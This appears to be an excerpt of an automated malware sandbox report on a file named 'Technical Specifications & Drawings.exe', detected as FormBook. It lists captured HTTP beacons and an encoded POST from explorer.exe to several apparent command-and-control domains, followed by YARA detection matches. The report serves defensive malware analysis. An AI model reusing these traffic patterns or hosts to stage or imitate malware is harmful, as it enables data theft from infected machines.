                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 69 72 63 68 68 6f 66 66 2d 64 61 72 72 79 6c 2e 63 6f 6d 2f 30 32 70 69 3f 5a 4c 30 3d 4a 4f 39 70 77 44 41 46 58 30 70 45 30 38 5a 68 42 36 4a 73 51 66 49 4b 62 71 33 32 63 4d 4e 48 55 73 39 34 62 41 4b 39 31 2b 4b 67 71 70 50 47 53 4a 71 4b 43 37 4a 33 7a 53 30 72 31 67 7a 65 33 4d 2b 32 71 46 5a 6c 32 4e 73 58 32 61 53 62 61 73 41 45 2b 5a 45 30 53 4c 38 75 36 7a 67 6e 65 77 3d 3d 26 61 6d 70 3b 77 52 74 64 70 3d 45 54 56 50 67 30 5f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6b 69 72 63 68 68 6f 66 66 2d 64 61 72 72 79 6c 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.kirchhoff-darryl.com/02pi?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&amp;wRtdp=ETVPg0_">here</a>.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.kirchhoff-darryl.com Port 80</address></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.349780109.234.162.6280C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 8, 2022 12:28:38.365463018 CEST7583OUTGET /02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_ HTTP/1.1
                                                Host: www.tomoptique.fr
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 12:28:38.864422083 CEST7587INHTTP/1.1 301 Moved Permanently
                                                Date: Mon, 08 Aug 2022 10:28:38 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 0
                                                Connection: close
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Location: http://tomoptique.fr/02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_
                                                Server: o2switch-PowerBoost-v3


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.34980367.23.226.11980C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 8, 2022 12:28:44.161489964 CEST7676OUTGET /02pi/?ZL0=4npjF3s9G6uWNp4ceBGqcNUcjkX96JEG8J4d3OAuWw45Kxpl9gSb2BHY5Eg4Nc6InaukRaYVJuT4y0aleUHPUlqgoOBFmRDZHQ==&wRtdp=ETVPg0_ HTTP/1.1
                                                Host: www.boshi-eg.online
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 12:28:44.300245047 CEST7677INHTTP/1.1 404 Not Found
                                                Date: Mon, 08 Aug 2022 10:28:44 GMT
                                                Server: Apache
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                3192.168.2.34980967.223.117.7280C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 8, 2022 12:28:49.631207943 CEST7769OUTGET /02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_ HTTP/1.1
                                                Host: www.esandcraic.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 12:28:49.902386904 CEST7770INHTTP/1.1 404 Not Found
                                                Date: Mon, 08 Aug 2022 10:28:49 GMT
                                                Server: Apache
                                                Content-Length: 5278
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-12.46 2.34-23.88 7.01-34.27 4.67
                                                Aug 8, 2022 12:28:49.902443886 CEST7772INData Raw: 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 2d 37 2e 35 20 31 36 2e 38 37 2d 31 33 2e 33 36 20 32 37 2e 31 32 2d 31 37 2e 35 36 20 31 30 2e 32 34 2d 34 2e 32 20 32 30 2e 39 33 2d 36 2e
                                                Data Ascii: -10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.74 16.99 3.87 6.33 6.87 13.19 8.
                                                Aug 8, 2022 12:28:49.902481079 CEST7773INData Raw: 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e
                                                Data Ascii: 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg><svg id="svgWrap_1" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0
                                                Aug 8, 2022 12:28:49.902518988 CEST7775INData Raw: 31 38 2e 31 33 2d 33 2e 32 36 68 2d 36 36 2e 34 31 63 2d 36 2e 31 34 2d 2e 30 39 2d 31 32 2e 31 31 2e 39 37 2d 31 37 2e 39 31 20 33 2e 31 39 2d 35 2e 38 31 20 32 2e 32 32 2d 31 30 2e 39 35 20 35 2e 34 33 2d 31 35 2e 34 34 20 39 2e 36 33 2d 34 2e
                                                Data Ascii: 18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.29-2.69 6-4.04 12.67-4.04 20.04v33.13c0 7.36 1.32 14.02 3.96 19.97 2.64 5.95 6.18 11.02 10.62 15.22 4.44 4.2 9.56 7.43 15.36 9.7 5.8 2.2
                                                Aug 8, 2022 12:28:49.902545929 CEST7775INData Raw: 0a 20 20 20 20 20 20 3c 2f 66 65 6d 65 72 67 65 3e 0a 20 20 20 20 3c 2f 66 69 6c 74 65 72 3e 0a 20 20 3c 2f 64 65 66 73 3e 0a 3c 2f 73 76 67 3e 0a 0a 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 0a 3c 2f 62 6f 64 79 3e
                                                Data Ascii: </femerge> </filter> </defs></svg><h2>Page Not Found</h2></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                4192.168.2.349817184.168.107.8080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 8, 2022 12:29:01.972229004 CEST8097OUTPOST /02pi/ HTTP/1.1
                                                Host: www.mexc-event-partner.site
                                                Connection: close
                                                Content-Length: 409
                                                Cache-Control: no-cache
                                                Origin: http://www.mexc-event-partner.site
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.mexc-event-partner.site/02pi/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Raw: 5a 4c 30 3d 44 76 79 6b 59 68 57 49 4d 35 4c 42 4a 6a 4d 50 6a 54 75 63 62 57 6d 55 44 47 6a 73 66 32 46 4f 72 53 64 48 57 70 34 47 61 33 74 68 66 6a 38 75 79 5f 54 78 59 47 53 44 75 33 62 4c 39 42 7a 62 39 47 57 70 74 79 46 63 62 75 70 69 6f 68 6f 32 6d 5a 51 56 77 5a 7e 45 62 35 42 51 71 64 43 78 66 72 6f 78 42 49 62 70 39 44 47 75 43 31 5a 30 69 52 7a 49 4d 53 7a 7a 32 78 43 77 6d 76 61 52 4e 31 7a 49 62 44 50 49 4d 5f 62 72 31 33 36 6b 6d 7a 39 35 4e 67 61 62 55 51 4a 31 6b 50 63 62 41 55 71 63 37 55 45 52 32 73 48 51 55 66 46 65 5a 46 4f 7a 35 4e 4e 35 7a 68 6b 4a 6b 50 6b 35 57 53 37 6a 28 47 52 42 41 71 49 7a 64 74 78 42 54 72 46 39 36 4c 77 2d 57 32 63 52 66 32 63 57 74 31 28 5f 4b 43 54 63 65 35 74 43 76 64 59 53 45 5f 6f 36 59 31 59 2d 41 79 45 43 4f 36 6e 73 66 6e 71 72 39 4d 35 34 6d 44 79 6f 39 47 71 66 4f 48 6c 58 37 74 41 41 7a 32 51 4a 71 51 41 63 33 52 49 4f 45 2d 42 64 71 4a 48 6c 69 37 6b 68 41 6c 45 4f 6d 68 6a 72 35 37 6b 71 6e 4e 55 6f 6e 4e 66 4f 51 70 48 43 58 79 67 71 66 58 67 68 77 34 71 52 56 47 6c 61 38 50 50 57 5a 63 4c 6c 7e 38 65 44 72 52 57 79 48 4a 59 70 30 53 4a 41 56 59 6c 76 6d 33 33 33 6c 6f 4f 2d 6b 6b 54 2d 63 69 57 52 79 36 54 35 7a 51 79 71 52 6f 44 4c 6d 41 29 2e 00 00 00 00 00 00 00 00
                                                Data Ascii: ZL0=DvykYhWIM5LBJjMPjTucbWmUDGjsf2FOrSdHWp4Ga3thfj8uy_TxYGSDu3bL9Bzb9GWptyFcbupioho2mZQVwZ~Eb5BQqdCxfroxBIbp9DGuC1Z0iRzIMSzz2xCwmvaRN1zIbDPIM_br136kmz95NgabUQJ1kPcbAUqc7UER2sHQUfFeZFOz5NN5zhkJkPk5WS7j(GRBAqIzdtxBTrF96Lw-W2cRf2cWt1(_KCTce5tCvdYSE_o6Y1Y-AyECO6nsfnqr9M54mDyo9GqfOHlX7tAAz2QJqQAc3RIOE-BdqJHli7khAlEOmhjr57kqnNUonNfOQpHCXygqfXghw4qRVGla8PPWZcLl~8eDrRWyHJYp0SJAVYlvm333loO-kkT-ciWRy6T5zQyqRoDLmA).
                                                Aug 8, 2022 12:29:02.232486010 CEST8099INHTTP/1.1 404 Not Found
                                                Date: Mon, 08 Aug 2022 10:29:02 GMT
                                                Server: Apache
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                5192.168.2.349818184.168.107.8080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 8, 2022 12:29:02.227710009 CEST8098OUTGET /02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_ HTTP/1.1
                                                Host: www.mexc-event-partner.site
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 12:29:02.489057064 CEST8100INHTTP/1.1 404 Not Found
                                                Date: Mon, 08 Aug 2022 10:29:02 GMT
                                                Server: Apache
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:12:27:07
                                                Start date:08/08/2022
                                                Path:C:\Users\user\Desktop\Technical Specifications & Drawings.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Technical Specifications & Drawings.exe"
                                                Imagebase:0x400000
                                                File size:800256 bytes
                                                MD5 hash:9B94F751E8CC145058DB9F428C2AD571
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.264997908.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low

                                                General

                                                Target ID:4
                                                Start time:12:27:16
                                                Start date:08/08/2022
                                                Path:C:\Users\user\Desktop\Technical Specifications & Drawings.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\Desktop\Technical Specifications & Drawings.exe
                                                Imagebase:0xd20000
                                                File size:800256 bytes
                                                MD5 hash:9B94F751E8CC145058DB9F428C2AD571
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Target ID:5
                                                Start time:12:27:19
                                                Start date:08/08/2022
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0x7ff6b8cf0000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
